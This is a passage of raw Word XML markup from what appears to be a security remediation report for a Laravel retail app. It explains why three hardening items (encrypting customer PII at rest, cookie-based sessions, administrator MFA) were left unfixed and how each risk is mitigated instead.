                                  <a:pt x="0" y="123825"/>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59" style="width:120pt;height:45pt;position:absolute;z-index:-2147483615;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:129.68pt;mso-position-vertical-relative:text;margin-top:-1.48206pt;" coordsize="15240,5715">
                <v:shape id="Shape 2771" style="position:absolute;width:5810;height:1333;left:9429;top:0;" coordsize="581025,133350" path="m9525,0l571500,0c574131,0,576376,918,578235,2778c580095,4638,581025,6883,581025,9525l581025,123825c581025,126454,580095,128699,578235,130559c576376,132420,574131,133350,571500,133350l9525,133350c6895,133350,4650,132420,2790,130559c930,128699,0,126454,0,123825l0,9525c0,6883,930,4638,2790,2778c4650,918,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 2775" style="position:absolute;width:5810;height:1428;left:0;top:1714;" coordsize="581025,142875" path="m9525,0l571500,0c574130,0,576375,930,578235,2778c580095,4638,581025,6896,581025,9525l581025,133350c581025,135967,580095,138224,578235,140060c576375,141920,574130,142850,571500,142875l9525,142875c6895,142850,4650,141920,2790,140060c930,138224,0,135967,0,133350l0,9525c0,6896,930,4638,2790,2778c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 2780" style="position:absolute;width:2857;height:1333;left:11525;top:4381;" coordsize="285750,133350" path="m9525,0l276225,0c278855,0,281100,930,282960,2766c284820,4626,285750,6883,285750,9525l285750,123825c285750,126442,284820,128674,282960,130535c281100,132395,278855,133325,276225,133350l9525,133350c6895,133325,4650,132395,2790,130535c930,128674,0,126442,0,123825l0,9525c0,6883,930,4626,2790,2766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NF-1 · Encryption of customer PII at rest.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>customers</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> table stores names, addresses, phone numbers and NIC numbers in </w:t>
      </w:r>
      <w:r w:rsidR="00674944" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plain text</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. Laravel's </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>encrypted</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> cast would protect them against a database-file compromise or a stolen backup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743FDBFA" w14:textId="75D79CE2"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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Why not:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> an encrypted column cannot be indexed or </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LIKE </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-searched, and customer search by name and phone is the single most-used feature on the till. Doing it properly needs blind indexing (a searchable HMAC of the </w:t>
      </w:r>
      <w:r w:rsidR="00674944" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>normalized</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> value alongside the ciphertext), which is a data-migration and query-rewrite project across six controllers. </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Mitigated:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the paths that expose this data are now authenticated, role-gated and department-scoped (V-01/V-02/V-03), and reading it is audited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E6FF47"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1296" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4F99B935" wp14:editId="57630124">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>389632</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-19583</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1504950" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="29760" name="Group 29760"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1504950" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1504950" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2789" name="Shape 2789"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1504950" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1504950" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1495425" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1498055" y="0"/>
                                  <a:pt x="1500300" y="930"/>
                                  <a:pt x="1502160" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1504020" y="4651"/>
                                  <a:pt x="1504950" y="6896"/>
                                  <a:pt x="1504950" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1504950" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1504950" y="135967"/>
                                  <a:pt x="1504020" y="138199"/>
                                  <a:pt x="1502160" y="140060"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1500300" y="141920"/>
                                  <a:pt x="1498055" y="142850"/>
                                  <a:pt x="1495425" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142850"/>
                                  <a:pt x="4650" y="141920"/>
                                  <a:pt x="2790" y="140060"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138199"/>
                                  <a:pt x="0" y="135967"/>
                                  <a:pt x="0" y="133350"/>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60" style="width:118.5pt;height:11.25pt;position:absolute;z-index:-2147483601;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:30.6797pt;mso-position-vertical-relative:text;margin-top:-1.54205pt;" coordsize="15049,1428">
                <v:shape id="Shape 2789" style="position:absolute;width:15049;height:1428;left:0;top:0;" coordsize="1504950,142875" path="m9525,0l1495425,0c1498055,0,1500300,930,1502160,2791c1504020,4651,1504950,6896,1504950,9525l1504950,133350c1504950,135967,1504020,138199,1502160,140060c1500300,141920,1498055,142850,1495425,142875l9525,142875c6895,142850,4650,141920,2790,140060c930,138199,0,135967,0,133350l0,9525c0,6896,930,4651,2790,2791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 xml:space="preserve">NF-2 · </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>httpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SameSite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=Strict</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> cookie instead of a bearer token.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A cookie script cannot </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>read</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> at all is strictly better than any token the page can reach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DC3191" w14:textId="0DCB5AAE"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2320" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C2FA895" wp14:editId="1B632230">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1589782</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>324545</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="752475" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="29762" name="Group 29762"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="752475" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="752475" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2800" name="Shape 2800"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="752475" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="752475" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="742950" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="745580" y="0"/>
                                  <a:pt x="747825" y="930"/>
                                  <a:pt x="749685" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="751545" y="4626"/>
                                  <a:pt x="752475" y="6883"/>
                                  <a:pt x="752475" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="752475" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="752475" y="135967"/>
                                  <a:pt x="751545" y="138224"/>
                                  <a:pt x="749685" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="747825" y="141945"/>
                                  <a:pt x="745580" y="142875"/>
                                  <a:pt x="742950" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="135967"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6883"/>
                                  <a:pt x="930" y="4626"/>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62" style="width:59.25pt;height:11.25pt;position:absolute;z-index:-2147483590;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:125.18pt;mso-position-vertical-relative:text;margin-top:25.5547pt;" coordsize="7524,1428">
                <v:shape id="Shape 2800" style="position:absolute;width:7524;height:1428;left:0;top:0;" coordsize="752475,142875" path="m9525,0l742950,0c745580,0,747825,930,749685,2791c751545,4626,752475,6883,752475,9525l752475,133350c752475,135967,751545,138224,749685,140084c747825,141945,745580,142875,742950,142875l9525,142875c6895,142875,4650,141945,2790,140084c930,138224,0,135967,0,133350l0,9525c0,6883,930,4626,2790,2791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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Why not:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> it requires Sanctum's stateful SPA mode and a shared parent domain, and this app is deployed cross-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">origin  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Vercel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> frontend, shared-host API. Changing that is a deployment-topology decision, not a code change. </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Mitigated:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> per-tab in-memory storage instead of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>localStorage</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8-hour server-side expiry, role-scoped abilities, XSS removed at source (V13), and a strict CSP (V-18). The residual window is one tab-session rather than forever.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42665B4C" w14:textId="70BDC4E7" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="166" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="43"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NF-3 · MFA / TOTP for administrators.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="00674944" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>highest value</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00674944" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">remains </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00674944" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC9415B" w14:textId="6B762A9C"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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Why not:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> it needs a secret store, enrolment UI, recovery codes and a lockout-recovery procedure for a shop with no IT desk</w:t>
      </w:r>
      <w:r w:rsidR="00674944">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>feature in its own right, beyond</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00674944" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>these assignments</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> timebox. </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Partially mitigated:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> an administrator signing in with Google is protected by that account's 2FA, so the OIDC work delivers most of the benefit for the strongest login path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DD3C97"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3344" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="45235EE8" wp14:editId="78FCD174">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1856482</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>153095</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="809625" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="29763" name="Group 29763"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="809625" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="809625" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2819" name="Shape 2819"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="809625" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="809625" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="800100" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="802730" y="0"/>
                                  <a:pt x="804975" y="930"/>
                                  <a:pt x="806835" y="2766"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="808695" y="4626"/>
                                  <a:pt x="809625" y="6883"/>
                                  <a:pt x="809625" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="809625" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="809625" y="135967"/>
                                  <a:pt x="808695" y="138224"/>
                                  <a:pt x="806835" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
